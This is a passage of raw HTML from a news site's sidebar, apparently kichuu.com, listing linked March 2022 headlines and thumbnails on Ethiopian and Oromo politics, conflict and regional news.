src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Menelik" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-678x509.png 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/screenshot-2022-03-20-at-10.25.03-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/king-leopold-of-belgium-and-emperor-menelik-joint-imperial-ambitions/" title="King Leopold of Belgium and Emperor Menelik – Joint Imperial Ambitions">
										King Leopold of Belgium and Emperor Menelik – Joint Imperial Ambitions									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114592 post type-post status-publish format-standard has-post-thumbnail category-africa">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/in-borena-elwaye-district-hongen-is-killing-people/" title="In Borena, Elwaye district, Hongen is killing people!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Borena" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-e1647794870902.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Borena" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275111345_130084309590602_8265176554239136207_n-e1647794870902.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/in-borena-elwaye-district-hongen-is-killing-people/" title="In Borena, Elwaye district, Hongen is killing people!">
										In Borena, Elwaye district, Hongen is killing people!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114586 post type-post status-publish format-standard has-post-thumbnail category-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/sirna-eebba-jajjabee-wbo-bahaa-shaggar-bit-2022/" title="Sirna Eebba, Jajjabee WBO Bahaa Shaggar Bit 2022"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="WBO" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-e1647794264682.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="WBO" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap139-e1647794264682.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/sirna-eebba-jajjabee-wbo-bahaa-shaggar-bit-2022/" title="Sirna Eebba, Jajjabee WBO Bahaa Shaggar Bit 2022">
										Sirna Eebba, Jajjabee WBO Bahaa Shaggar Bit 2022									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 20, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114576 post type-post status-publish format-standard has-post-thumbnail category-news-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/biltsiginnaan-koloneelotasaa-130-rashanuun-himame/" title="Biltsiginnaan Koloneelotasaa 130 ‘Rashanuun’ himame."><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Biltsiginnaan" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Biltsiginnaan" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275656978_1870687876451282_6918541252286122825_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/biltsiginnaan-koloneelotasaa-130-rashanuun-himame/" title="Biltsiginnaan Koloneelotasaa 130 ‘Rashanuun’ himame.">
										Biltsiginnaan Koloneelotasaa 130 ‘Rashanuun’ himame.									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114567 post type-post status-publish format-standard has-post-thumbnail category-africa">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/a-catastrophic-forecast-for-the-horn-of-africa/" title="A catastrophic forecast for the Horn of Africa"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Horn -Africa" loading="lazy" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2018/04/Reliefweb-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2018/04/Reliefweb-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Horn -Africa" loading="lazy" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/a-catastrophic-forecast-for-the-horn-of-africa/" title="A catastrophic forecast for the Horn of Africa">
										A catastrophic forecast for the Horn of Africa									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114561 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/watch-uae-airlifts-30-tonnes-of-food-aid-to-ethiopias-tigray-region/" title="Watch: UAE airlifts 30 tonnes of food aid to Ethiopia’s Tigray region"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="UAE" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-e1647728187466.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="UAE" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/uae-plane-with-food-to-ethiopia-1647705763332_17fa2eaae1c_large-e1647728187466.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/watch-uae-airlifts-30-tonnes-of-food-aid-to-ethiopias-tigray-region/" title="Watch: UAE airlifts 30 tonnes of food aid to Ethiopia’s Tigray region">
										Watch: UAE airlifts 30 tonnes of food aid to Ethiopia’s Tigray region									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114555 post type-post status-publish format-standard has-post-thumbnail category-world">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-egypt-sudan-hold-secret-meeting-in-uae-to-discuss-operation-of-gerd-report/" title="Ethiopia, Egypt, Sudan Hold Secret Meeting In UAE To Discuss Operation Of GERD: Report"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia-Egypt" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-80x60.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-326x245.webp 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-80x60.webp" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-80x60.webp" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia-Egypt" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-80x60.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/j1ixof3tph6z3jpe_1647686551-326x245.webp 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-egypt-sudan-hold-secret-meeting-in-uae-to-discuss-operation-of-gerd-report/" title="Ethiopia, Egypt, Sudan Hold Secret Meeting In UAE To Discuss Operation Of GERD: Report">
										Ethiopia, Egypt, Sudan Hold Secret Meeting In UAE To Discuss Operation Of GERD: Report									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114548 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/new-arms-shipments-to-ethiopia-ola-expands-into-northern-oromia/" title="New arms shipments to Ethiopia &#8211; OLA expands into Northern Oromia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OLA" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OLA" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/275908122_3036417853355234_4782732462348275183_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/new-arms-shipments-to-ethiopia-ola-expands-into-northern-oromia/" title="New arms shipments to Ethiopia &#8211; OLA expands into Northern Oromia">
										New arms shipments to Ethiopia &#8211; OLA expands into Northern Oromia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114543 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-oromia-political-analysis-what-does-it-mean/" title="Ethiopia/Oromia : Political analysis &#8211; what does it mean?"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia-Oromia" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-e1647716716593.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia-Oromia" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap6-e1647716716593.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ethiopia-oromia-political-analysis-what-does-it-mean/" title="Ethiopia/Oromia : Political analysis &#8211; what does it mean?">
										Ethiopia/Oromia : Political analysis &#8211; what does it mean?									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114538 post type-post status-publish format-standard has-post-thumbnail category-radio">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/oromiyaa-oromoo-qophii-arraata-biyyoolessa-oromiyaa-bitootessa-19-2022/" title="Oromiyaa/Oromoo!! Qophii Arraata Biyyoolessa Oromiyaa Bitootessa 19, 2022"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromiyaa" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-e1647706142546.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromiyaa" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap92-e1647706142546.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/oromiyaa-oromoo-qophii-arraata-biyyoolessa-oromiyaa-bitootessa-19-2022/" title="Oromiyaa/Oromoo!! Qophii Arraata Biyyoolessa Oromiyaa Bitootessa 19, 2022">
										Oromiyaa/Oromoo!! Qophii Arraata Biyyoolessa Oromiyaa Bitootessa 19, 2022									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114531 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/oduu-amee-bilxiginaa-iratii-himanii-ajechaa-sukanesaa-mana-murtii-banamee/" title="ODUU AMEE Bilxiginaa Iratii Himanii Ajechaa Sukanesaa Mana Murtii Banamee"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Bilxiginaa" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-e1647703529563.jpg 400w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Bilxiginaa" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-700x525.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/pizap138-e1647703529563.jpg 400w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/oduu-amee-bilxiginaa-iratii-himanii-ajechaa-sukanesaa-mana-murtii-banamee/" title="ODUU AMEE Bilxiginaa Iratii Himanii Ajechaa Sukanesaa Mana Murtii Banamee">
										ODUU AMEE Bilxiginaa Iratii Himanii Ajechaa Sukanesaa Mana Murtii Banamee									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114521 post type-post status-publish format-standard has-post-thumbnail category-tv">
															<figure class="mh-custom-posts-thumb">
